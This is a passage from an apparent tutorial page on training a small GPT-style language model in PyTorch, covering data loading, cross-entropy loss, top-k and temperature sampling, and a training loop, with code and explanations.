            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
 | 
			
		||||
 | 
			
		||||
        self.final_norm = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
 | 
			
		||||
 | 
			
		||||
    def forward(self, in_idx):
 | 
			
		||||
        batch_size, seq_len = in_idx.shape
 | 
			
		||||
        tok_embeds = self.tok_emb(in_idx)
 | 
			
		||||
        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
 | 
			
		||||
        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
        x = self.drop_emb(x)
 | 
			
		||||
        x = self.trf_blocks(x)
 | 
			
		||||
        x = self.final_norm(x)
 | 
			
		||||
        logits = self.out_head(x)
 | 
			
		||||
        return logits
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
</details>
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Download contents to train the data with
 | 
			
		||||
import os
 | 
			
		||||
import urllib.request
 | 
			
		||||
 | 
			
		||||
file_path = "the-verdict.txt"
 | 
			
		||||
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"
 | 
			
		||||
 | 
			
		||||
if not os.path.exists(file_path):
 | 
			
		||||
    with urllib.request.urlopen(url) as response:
 | 
			
		||||
        text_data = response.read().decode('utf-8')
 | 
			
		||||
    with open(file_path, "w", encoding="utf-8") as file:
 | 
			
		||||
        file.write(text_data)
 | 
			
		||||
else:
 | 
			
		||||
    with open(file_path, "r", encoding="utf-8") as file:
 | 
			
		||||
        text_data = file.read()
 | 
			
		||||
 | 
			
		||||
total_characters = len(text_data)
 | 
			
		||||
tokenizer = tiktoken.get_encoding("gpt2")
 | 
			
		||||
total_tokens = len(tokenizer.encode(text_data))
 | 
			
		||||
 | 
			
		||||
print("Data downloaded")
 | 
			
		||||
print("Characters:", total_characters)
 | 
			
		||||
print("Tokens:", total_tokens)
 | 
			
		||||
 | 
			
		||||
# Model initialization
 | 
			
		||||
GPT_CONFIG_124M = {
 | 
			
		||||
    "vocab_size": 50257,   # Vocabulary size
 | 
			
		||||
    "context_length": 256, # Shortened context length (orig: 1024)
 | 
			
		||||
    "emb_dim": 768,        # Embedding dimension
 | 
			
		||||
    "n_heads": 12,         # Number of attention heads
 | 
			
		||||
    "n_layers": 12,        # Number of layers
 | 
			
		||||
    "drop_rate": 0.1,      # Dropout rate
 | 
			
		||||
    "qkv_bias": False      # Query-key-value bias
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
model.eval()
 | 
			
		||||
print ("Model initialized")
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Functions to transform from tokens to ids and from to ids to tokens
 | 
			
		||||
def text_to_token_ids(text, tokenizer):
 | 
			
		||||
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
 | 
			
		||||
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
 | 
			
		||||
    return encoded_tensor
 | 
			
		||||
 | 
			
		||||
def token_ids_to_text(token_ids, tokenizer):
 | 
			
		||||
    flat = token_ids.squeeze(0) # remove batch dimension
 | 
			
		||||
    return tokenizer.decode(flat.tolist())
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Define loss functions
 | 
			
		||||
def calc_loss_batch(input_batch, target_batch, model, device):
 | 
			
		||||
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
 | 
			
		||||
    logits = model(input_batch)
 | 
			
		||||
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
 | 
			
		||||
    return loss
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
 | 
			
		||||
    total_loss = 0.
 | 
			
		||||
    if len(data_loader) == 0:
 | 
			
		||||
        return float("nan")
 | 
			
		||||
    elif num_batches is None:
 | 
			
		||||
        num_batches = len(data_loader)
 | 
			
		||||
    else:
 | 
			
		||||
        # Reduce the number of batches to match the total number of batches in the data loader
 | 
			
		||||
        # if num_batches exceeds the number of batches in the data loader
 | 
			
		||||
        num_batches = min(num_batches, len(data_loader))
 | 
			
		||||
    for i, (input_batch, target_batch) in enumerate(data_loader):
 | 
			
		||||
        if i < num_batches:
 | 
			
		||||
            loss = calc_loss_batch(input_batch, target_batch, model, device)
 | 
			
		||||
            total_loss += loss.item()
 | 
			
		||||
        else:
 | 
			
		||||
            break
 | 
			
		||||
    return total_loss / num_batches
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Apply Train/validation ratio and create dataloaders
 | 
			
		||||
train_ratio = 0.90
 | 
			
		||||
split_idx = int(train_ratio * len(text_data))
 | 
			
		||||
train_data = text_data[:split_idx]
 | 
			
		||||
val_data = text_data[split_idx:]
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
train_loader = create_dataloader_v1(
 | 
			
		||||
    train_data,
 | 
			
		||||
    batch_size=2,
 | 
			
		||||
    max_length=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    stride=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    drop_last=True,
 | 
			
		||||
    shuffle=True,
 | 
			
		||||
    num_workers=0
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
val_loader = create_dataloader_v1(
 | 
			
		||||
    val_data,
 | 
			
		||||
    batch_size=2,
 | 
			
		||||
    max_length=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    stride=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    drop_last=False,
 | 
			
		||||
    shuffle=False,
 | 
			
		||||
    num_workers=0
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Sanity checks
 | 
			
		||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
 | 
			
		||||
    print("Not enough tokens for the training loader. "
 | 
			
		||||
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
 | 
			
		||||
          "increase the `training_ratio`")
 | 
			
		||||
 | 
			
		||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
 | 
			
		||||
    print("Not enough tokens for the validation loader. "
 | 
			
		||||
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
 | 
			
		||||
          "decrease the `training_ratio`")
 | 
			
		||||
 | 
			
		||||
print("Train loader:")
 | 
			
		||||
for x, y in train_loader:
 | 
			
		||||
    print(x.shape, y.shape)
 | 
			
		||||
 | 
			
		||||
print("\nValidation loader:")
 | 
			
		||||
for x, y in val_loader:
 | 
			
		||||
    print(x.shape, y.shape)
 | 
			
		||||
 | 
			
		||||
train_tokens = 0
 | 
			
		||||
for input_batch, target_batch in train_loader:
 | 
			
		||||
    train_tokens += input_batch.numel()
 | 
			
		||||
 | 
			
		||||
val_tokens = 0
 | 
			
		||||
for input_batch, target_batch in val_loader:
 | 
			
		||||
    val_tokens += input_batch.numel()
 | 
			
		||||
 | 
			
		||||
print("Training tokens:", train_tokens)
 | 
			
		||||
print("Validation tokens:", val_tokens)
 | 
			
		||||
print("All tokens:", train_tokens + val_tokens)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Indicate the device to use
 | 
			
		||||
if torch.cuda.is_available():
 | 
			
		||||
    device = torch.device("cuda")
 | 
			
		||||
elif torch.backends.mps.is_available():
 | 
			
		||||
    device = torch.device("mps")
 | 
			
		||||
else:
 | 
			
		||||
    device = torch.device("cpu")
 | 
			
		||||
 | 
			
		||||
print(f"Using {device} device.")
 | 
			
		||||
 | 
			
		||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Pre-calculate losses without starting yet
 | 
			
		||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
 | 
			
		||||
 | 
			
		||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
 | 
			
		||||
    train_loss = calc_loss_loader(train_loader, model, device)
 | 
			
		||||
    val_loss = calc_loss_loader(val_loader, model, device)
 | 
			
		||||
 | 
			
		||||
print("Training loss:", train_loss)
 | 
			
		||||
print("Validation loss:", val_loss)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Functions to train the data
 | 
			
		||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
 | 
			
		||||
                       eval_freq, eval_iter, start_context, tokenizer):
 | 
			
		||||
    # Initialize lists to track losses and tokens seen
 | 
			
		||||
    train_losses, val_losses, track_tokens_seen = [], [], []
 | 
			
		||||
    tokens_seen, global_step = 0, -1
 | 
			
		||||
 | 
			
		||||
    # Main training loop
 | 
			
		||||
    for epoch in range(num_epochs):
 | 
			
		||||
        model.train()  # Set model to training mode
 | 
			
		||||
 | 
			
		||||
        for input_batch, target_batch in train_loader:
 | 
			
		||||
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
 | 
			
		||||
            loss = calc_loss_batch(input_batch, target_batch, model, device)
 | 
			
		||||
            loss.backward() # Calculate loss gradients
 | 
			
		||||
            optimizer.step() # Update model weights using loss gradients
 | 
			
		||||
            tokens_seen += input_batch.numel()
 | 
			
		||||
            global_step += 1
 | 
			
		||||
 | 
			
		||||
            # Optional evaluation step
 | 
			
		||||
            if global_step % eval_freq == 0:
 | 
			
		||||
                train_loss, val_loss = evaluate_model(
 | 
			
		||||
                    model, train_loader, val_loader, device, eval_iter)
 | 
			
		||||
                train_losses.append(train_loss)
 | 
			
		||||
                val_losses.append(val_loss)
 | 
			
		||||
                track_tokens_seen.append(tokens_seen)
 | 
			
		||||
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
 | 
			
		||||
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
 | 
			
		||||
 | 
			
		||||
        # Print a sample text after each epoch
 | 
			
		||||
        generate_and_print_sample(
 | 
			
		||||
            model, tokenizer, device, start_context
 | 
			
		||||
        )
 | 
			
		||||
 | 
			
		||||
    return train_losses, val_losses, track_tokens_seen
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
 | 
			
		||||
    model.eval()
 | 
			
		||||
    with torch.no_grad():
 | 
			
		||||
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
 | 
			
		||||
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
 | 
			
		||||
    model.train()
 | 
			
		||||
    return train_loss, val_loss
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def generate_and_print_sample(model, tokenizer, device, start_context):
 | 
			
		||||
    model.eval()
 | 
			
		||||
    context_size = model.pos_emb.weight.shape[0]
 | 
			
		||||
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
 | 
			
		||||
    with torch.no_grad():
 | 
			
		||||
        token_ids = generate_text(
 | 
			
		||||
            model=model, idx=encoded,
 | 
			
		||||
            max_new_tokens=50, context_size=context_size
 | 
			
		||||
        )
 | 
			
		||||
    decoded_text = token_ids_to_text(token_ids, tokenizer)
 | 
			
		||||
    print(decoded_text.replace("\n", " "))  # Compact print format
 | 
			
		||||
    model.train()
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Start training!
 | 
			
		||||
import time
 | 
			
		||||
start_time = time.time()
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
model.to(device)
 | 
			
		||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
 | 
			
		||||
 | 
			
		||||
num_epochs = 10
 | 
			
		||||
train_losses, val_losses, tokens_seen = train_model_simple(
 | 
			
		||||
    model, train_loader, val_loader, optimizer, device,
 | 
			
		||||
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
 | 
			
		||||
    start_context="Every effort moves you", tokenizer=tokenizer
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
end_time = time.time()
 | 
			
		||||
execution_time_minutes = (end_time - start_time) / 60
 | 
			
		||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
# Show graphics with the training process
 | 
			
		||||
import matplotlib.pyplot as plt
 | 
			
		||||
from matplotlib.ticker import MaxNLocator
 | 
			
		||||
import math
 | 
			
		||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
 | 
			
		||||
    fig, ax1 = plt.subplots(figsize=(5, 3))
 | 
			
		||||
    ax1.plot(epochs_seen, train_losses, label="Training loss")
 | 
			
		||||
    ax1.plot(
 | 
			
		||||
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
 | 
			
		||||
    )
 | 
			
		||||
    ax1.set_xlabel("Epochs")
 | 
			
		||||
    ax1.set_ylabel("Loss")
 | 
			
		||||
    ax1.legend(loc="upper right")
 | 
			
		||||
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
 | 
			
		||||
    ax2 = ax1.twiny()
 | 
			
		||||
    ax2.plot(tokens_seen, train_losses, alpha=0)
 | 
			
		||||
    ax2.set_xlabel("Tokens seen")
 | 
			
		||||
    fig.tight_layout()
 | 
			
		||||
    plt.show()
 | 
			
		||||
 | 
			
		||||
    # Compute perplexity from the loss values
 | 
			
		||||
    train_ppls = [math.exp(loss) for loss in train_losses]
 | 
			
		||||
    val_ppls = [math.exp(loss) for loss in val_losses]
 | 
			
		||||
    # Plot perplexity over tokens seen
 | 
			
		||||
    plt.figure()
 | 
			
		||||
    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
 | 
			
		||||
    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
 | 
			
		||||
    plt.xlabel('Tokens Seen')
 | 
			
		||||
    plt.ylabel('Perplexity')
 | 
			
		||||
    plt.title('Perplexity over Training')
 | 
			
		||||
    plt.legend()
 | 
			
		||||
    plt.show()
 | 
			
		||||
 | 
			
		||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
 | 
			
		||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
torch.save({
 | 
			
		||||
    "model_state_dict": model.state_dict(),
 | 
			
		||||
    "optimizer_state_dict": optimizer.state_dict(),
 | 
			
		||||
    },
 | 
			
		||||
"/tmp/model_and_optimizer.pth"
 | 
			
		||||
)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
Let's see an explanation step by step
 | 
			
		||||
 | 
			
		||||
### Functions to transform text <--> ids
 | 
			
		||||
 | 
			
		||||
These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Functions to transform from tokens to ids and from to ids to tokens
 | 
			
		||||
def text_to_token_ids(text, tokenizer):
 | 
			
		||||
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
 | 
			
		||||
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
 | 
			
		||||
    return encoded_tensor
 | 
			
		||||
 | 
			
		||||
def token_ids_to_text(token_ids, tokenizer):
 | 
			
		||||
    flat = token_ids.squeeze(0) # remove batch dimension
 | 
			
		||||
    return tokenizer.decode(flat.tolist())
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Generate text functions
 | 
			
		||||
 | 
			
		||||
In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic.
 | 
			
		||||
 | 
			
		||||
The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts.
 | 
			
		||||
 | 
			
		||||
- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`.
 | 
			
		||||
- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have.
 | 
			
		||||
- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1.
 | 
			
		||||
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Generate text function
 | 
			
		||||
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
 | 
			
		||||
 | 
			
		||||
    # For-loop is the same as before: Get logits, and only focus on last time step
 | 
			
		||||
    for _ in range(max_new_tokens):
 | 
			
		||||
        idx_cond = idx[:, -context_size:]
 | 
			
		||||
        with torch.no_grad():
 | 
			
		||||
            logits = model(idx_cond)
 | 
			
		||||
        logits = logits[:, -1, :]
 | 
			
		||||
 | 
			
		||||
        # New: Filter logits with top_k sampling
 | 
			
		||||
        if top_k is not None:
 | 
			
		||||
            # Keep only top_k values
 | 
			
		||||
            top_logits, _ = torch.topk(logits, top_k)
 | 
			
		||||
            min_val = top_logits[:, -1]
 | 
			
		||||
            logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)
 | 
			
		||||
 | 
			
		||||
        # New: Apply temperature scaling
 | 
			
		||||
        if temperature > 0.0:
 | 
			
		||||
            logits = logits / temperature
 | 
			
		||||
 | 
			
		||||
            # Apply softmax to get probabilities
 | 
			
		||||
            probs = torch.softmax(logits, dim=-1)  # (batch_size, context_len)
 | 
			
		||||
 | 
			
		||||
            # Sample from the distribution
 | 
			
		||||
            idx_next = torch.multinomial(probs, num_samples=1)  # (batch_size, 1)
 | 
			
		||||
 | 
			
		||||
        # Otherwise same as before: get idx of the vocab entry with the highest logits value
 | 
			
		||||
        else:
 | 
			
		||||
            idx_next = torch.argmax(logits, dim=-1, keepdim=True)  # (batch_size, 1)
 | 
			
		||||
 | 
			
		||||
        if idx_next == eos_id:  # Stop generating early if end-of-sequence token is encountered and eos_id is specified
 | 
			
		||||
            break
 | 
			
		||||
 | 
			
		||||
        # Same as before: append sampled index to the running sequence
 | 
			
		||||
        idx = torch.cat((idx, idx_next), dim=1)  # (batch_size, num_tokens+1)
 | 
			
		||||
 | 
			
		||||
    return idx
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
 | 
			
		||||
>
 | 
			
		||||
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities 
 | 
			
		||||
>
 | 
			
		||||
> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
 | 
			
		||||
>
 | 
			
		||||
> _Note that this improvement isn't included in the previous code._
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\
 | 
			
		||||
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top 𝑘 k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
 | 
			
		||||
>
 | 
			
		||||
> _Note that this improvement isn't included in the previous code._
 | 
			
		||||
 | 
			
		||||
### Loss functions
 | 
			
		||||
 | 
			
		||||
The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\
 | 
			
		||||
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Define loss functions
 | 
			
		||||
def calc_loss_batch(input_batch, target_batch, model, device):
 | 
			
		||||
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
 | 
			
		||||
    logits = model(input_batch)
 | 
			
		||||
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
 | 
			
		||||
    return loss
 | 
			
		||||
 | 
			
		||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
 | 
			
		||||
    total_loss = 0.
 | 
			
		||||
    if len(data_loader) == 0:
 | 
			
		||||
        return float("nan")
 | 
			
		||||
    elif num_batches is None:
 | 
			
		||||
        num_batches = len(data_loader)
 | 
			
		||||
    else:
 | 
			
		||||
        # Reduce the number of batches to match the total number of batches in the data loader
 | 
			
		||||
        # if num_batches exceeds the number of batches in the data loader
 | 
			
		||||
        num_batches = min(num_batches, len(data_loader))
 | 
			
		||||
    for i, (input_batch, target_batch) in enumerate(data_loader):
 | 
			
		||||
        if i < num_batches:
 | 
			
		||||
            loss = calc_loss_batch(input_batch, target_batch, model, device)
 | 
			
		||||
            total_loss += loss.item()
 | 
			
		||||
        else:
 | 
			
		||||
            break
 | 
			
		||||
    return total_loss / num_batches
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model’s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
 | 
			
		||||
>
 | 
			
		||||
> _Note that this improvement isn't included in the previous code._
 | 
			
		||||
>
 | 
			
		||||
> Check the following example:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
### Loading Data
 | 
			
		||||
 | 
			
		||||
The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section.
 | 
			
		||||
 | 
			
		||||
From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\
 | 
			
		||||
Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model.
 | 
			
		||||
 | 
			
		||||
Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\
 | 
			
		||||
The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes.
 | 
			
		||||
 | 
			
		||||
Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set).
 | 
			
		||||
 | 
			
		||||
Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
train_ratio = 0.90
 | 
			
		||||
split_idx = int(train_ratio * len(text_data))
 | 
			
		||||
train_data = text_data[:split_idx]
 | 
			
		||||
val_data = text_data[split_idx:]
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
train_loader = create_dataloader_v1(
 | 
			
		||||
    train_data,
 | 
			
		||||
    batch_size=2,
 | 
			
		||||
    max_length=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    stride=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    drop_last=True,
 | 
			
		||||
    shuffle=True,
 | 
			
		||||
    num_workers=0
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
val_loader = create_dataloader_v1(
 | 
			
		||||
    val_data,
 | 
			
		||||
    batch_size=2,
 | 
			
		||||
    max_length=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    stride=GPT_CONFIG_124M["context_length"],
 | 
			
		||||
    drop_last=False,
 | 
			
		||||
    shuffle=False,
 | 
			
		||||
    num_workers=0
 | 
			
		||||
)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
## Sanity Checks
 | 
			
		||||
 | 
			
		||||
The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Sanity checks
 | 
			
		||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
 | 
			
		||||
    print("Not enough tokens for the training loader. "
 | 
			
		||||
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
 | 
			
		||||
          "increase the `training_ratio`")
 | 
			
		||||
 | 
			
		||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
 | 
			
		||||
    print("Not enough tokens for the validation loader. "
 | 
			
		||||
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
 | 
			
		||||
          "decrease the `training_ratio`")
 | 
			
		||||
 | 
			
		||||
print("Train loader:")
 | 
			
		||||
for x, y in train_loader:
 | 
			
		||||
    print(x.shape, y.shape)
 | 
			
		||||
 | 
			
		||||
print("\nValidation loader:")
 | 
			
		||||
for x, y in val_loader:
 | 
			
		||||
    print(x.shape, y.shape)
 | 
			
		||||
 | 
			
		||||
train_tokens = 0
 | 
			
		||||
for input_batch, target_batch in train_loader:
 | 
			
		||||
    train_tokens += input_batch.numel()
 | 
			
		||||
 | 
			
		||||
val_tokens = 0
 | 
			
		||||
for input_batch, target_batch in val_loader:
 | 
			
		||||
    val_tokens += input_batch.numel()
 | 
			
		||||
 | 
			
		||||
print("Training tokens:", train_tokens)
 | 
			
		||||
print("Validation tokens:", val_tokens)
 | 
			
		||||
print("All tokens:", train_tokens + val_tokens)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Select device for training & pre calculations
 | 
			
		||||
 | 
			
		||||
The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Indicate the device to use
 | 
			
		||||
 | 
			
		||||
if torch.cuda.is_available():
 | 
			
		||||
    device = torch.device("cuda")
 | 
			
		||||
elif torch.backends.mps.is_available():
 | 
			
		||||
    device = torch.device("mps")
 | 
			
		||||
else:
 | 
			
		||||
    device = torch.device("cpu")
 | 
			
		||||
 | 
			
		||||
print(f"Using {device} device.")
 | 
			
		||||
 | 
			
		||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
 | 
			
		||||
 | 
			
		||||
# Pre-calculate losses without starting yet
 | 
			
		||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
 | 
			
		||||
 | 
			
		||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
 | 
			
		||||
    train_loss = calc_loss_loader(train_loader, model, device)
 | 
			
		||||
    val_loss = calc_loss_loader(val_loader, model, device)
 | 
			
		||||
 | 
			
		||||
print("Training loss:", train_loss)
 | 
			
		||||
print("Validation loss:", val_loss)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Training functions
 | 
			
		||||
 | 
			
		||||
The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step.
 | 
			
		||||
 | 
			
		||||
The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training.
 | 
			
		||||
 | 
			
		||||
Then the big function `train_model_simple` is the one that actually train the model. It expects:
 | 
			
		||||
 | 
			
		||||
- The train data loader (with the data already separated and prepared for training)
 | 
			
		||||
- The validator loader
 | 
			
		||||
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
 | 
			
		||||
  - `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
 | 
			
		||||
  - The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized).
 | 
			
		||||
  - **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
 | 
			
		||||
    - Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
 | 
			
		||||
- The device to use for training
 | 
			
		||||
- The number of epochs: Number of times to go over the training data
 | 
			
		||||
- The evaluation frequency: The frequency to call `evaluate_model`
 | 
			
		||||
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample`
 | 
			
		||||
- The start context: Which the starting sentence to use when calling `generate_and_print_sample`
 | 
			
		||||
- The tokenizer
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Functions to train the data
 | 
			
		||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
 | 
			
		||||
                       eval_freq, eval_iter, start_context, tokenizer):
 | 
			
		||||
    # Initialize lists to track losses and tokens seen
 | 
			
		||||
    train_losses, val_losses, track_tokens_seen = [], [], []
 | 
			
		||||
    tokens_seen, global_step = 0, -1
 | 
			
		||||
 | 
			
		||||
    # Main training loop
 | 
			
		||||
    for epoch in range(num_epochs):
 | 
			
		||||
        model.train()  # Set model to training mode
 | 
			
		||||
 | 
			
		||||
        for input_batch, target_batch in train_loader:
 | 
			
		||||
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
 | 
			
		||||
            loss = calc_loss_batch(input_batch, target_batch, model, device)
 | 
			
		||||
            loss.backward() # Calculate loss gradients
 | 
			
